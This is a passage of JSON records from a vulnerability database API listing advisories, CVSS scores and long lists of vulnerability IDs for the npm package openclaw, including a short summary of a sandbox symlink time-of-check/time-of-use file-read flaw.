es/GHSA-wr6m-jg37-68xh","reference_id":"GHSA-wr6m-jg37-68xh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wr6m-jg37-68xh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["CVE-2026-32066","GHSA-wr6m-jg37-68xh"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2gmm-t3a3-rqh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50508?format=json","vulnerability_id":"VCID-93ka-ajkk-3keu","summary":"OpenClaw: Sandbox media TOCTOU could read files outside sandbox root\nSandbox media handling had a time-of-check/time-of-use gap: media paths could be validated first and read later through a separate path. A symlink retarget between those steps could cause reads outside `sandboxRoot`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/advisories/GHSA-7xmq-g46g-f8pv","reference_id":"GHSA-7xmq-g46g-f8pv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7xmq-g46g-f8pv"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7xmq-g46g-f8pv","reference_id":"GHSA-7xmq-g46g-f8pv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7xmq-g46g-f8pv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda